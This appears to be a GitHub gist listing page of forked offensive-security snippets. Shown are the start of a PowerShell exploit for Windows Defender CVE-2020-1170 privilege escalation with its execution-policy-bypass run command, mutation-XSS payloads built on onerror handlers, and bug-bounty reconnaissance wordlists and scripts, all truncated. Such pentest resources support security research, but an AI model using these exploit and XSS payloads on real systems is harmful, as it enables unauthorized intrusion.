mmg1’s gists

mmg1 / DefenderArbitraryFileDelete.ps1

Created February 4, 2021 15:41 — forked from gwillcox-r7/DefenderArbitraryFileDelete.ps1

Windows Defender CVE-2020-1170 LPE Work Archive

	# Taken from https://github.com/itm4n/CVEs/blob/master/CVE-2020-1170/DefenderArbitraryFileDelete.ps1 with minor modifications made where needed for Metasploit.
	# All credits go to @itm4n for this PowerShell script!

	# Testing
	# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ZZ_SANDBOX\WER'"
	# Real
	# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ProgramData\Microsoft\Windows\WER'

	$JobCode = {
	function DoMpCmdRunLogFileWriteTriggerJob {

mmg1 / all.txt

Created January 6, 2021 08:46 — forked from jhaddix/all.txt

all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/

This file has been truncated, but you can view the full file.


	.
	..
	........
	@
	*
	.
	..*
	ðŸŽ

mmg1 / all.txt

Created January 6, 2021 08:45 — forked from jhaddix/all.txt

all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/

This file has been truncated, but you can view the full file.


	.
	..
	........
	@
	*
	.
	..*
	ðŸŽ

mmg1 / findomain_integration.sh

Created June 28, 2020 09:48 — forked from Edu4rdSHL/findomain_integration.sh

Simple script to collect the info from the top enumeration tools, unify all the results in a same file, import the data to Findomain and include it in the monitoring process while saving to database.

	#!/usr/bin/env bash
	# Simple script to collect the info from the top enumeration tools, unify all the results in a same file, import the data to Findomain and include it in the monitoring process while saving to database.
	# Usage:
	# ./findomain_integration.sh domains_file findomain_config_file

	domains_file="$1"
	config_file="$2"
	total_file="all_external_subdomains.txt"

	external_sources() {

mmg1 / mXSS

Created June 21, 2020 10:36 — forked from irsdl/mXSS

some mXSS samples

	<img alt="<x" title="/><img src=url404 onerror=xss(0)>">

	<img alt="
	<x" title="/>
	<img src=url404 onerror=xss(1)>">

	<style><style/><img src=url404 onerror=xss(2)>

	<xmp><xmp/><img src=url404 onerror=xss(3)>

mmg1 / amass_intel_for_loop

Created June 21, 2020 10:22 — forked from jhaddix/amass_intel_for_loop

Foir loop to run amass intel for easy killing of single thread

for i in $(cat yahoobgp); do echo""; echo "ASN $i";echo ""; amass.netdomains -asn $i;echo ""; done

mmg1 / all.txt

Created June 21, 2020 10:22 — forked from jhaddix/all.txt

all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/

This file has been truncated, but you can view the full file.


	.
	..
	........
	@
	*
	.
	..*
	ðŸŽ

mmg1 / bgp.sh

Created June 21, 2020 10:22 — forked from jhaddix/bgp.sh

copy in bghp.he.net to this script and get amass command

	#!/bin/bash

	expand $1 \|cut -d " " -f1\|sed 's/AS//g'
	echo ""
	echo ""
	lined=`expand $1 \|cut -d " " -f1\|sed 's/AS//g'\| tr '\n' ','`

mmg1 / bountyscan_setup.sh

Created June 21, 2020 10:22 — forked from jhaddix/bountyscan_setup.sh

	#!/bin/bash
	export DEBIAN_FRONTEND=noninteractive;
	echo "[] Starting Install... []"
	echo "[] Upgrade installed packages to latest []"
	echo -e "\nRunning a package upgrade...\n"
	apt-get -qq update && apt-get -qq dist-upgrade -y
	apt full-upgrade -y
	apt-get autoclean

	echo "[] Install stuff I use all the time []"

mmg1 / content_discovery_all.txt

Created June 21, 2020 10:22 — forked from jhaddix/content_discovery_all.txt

a masterlist of content discovery URLs and files (used most commonly with gobuster)

This file has been truncated, but you can view the full file.

	`
	~/
	~
	×™×


	___
	__
	_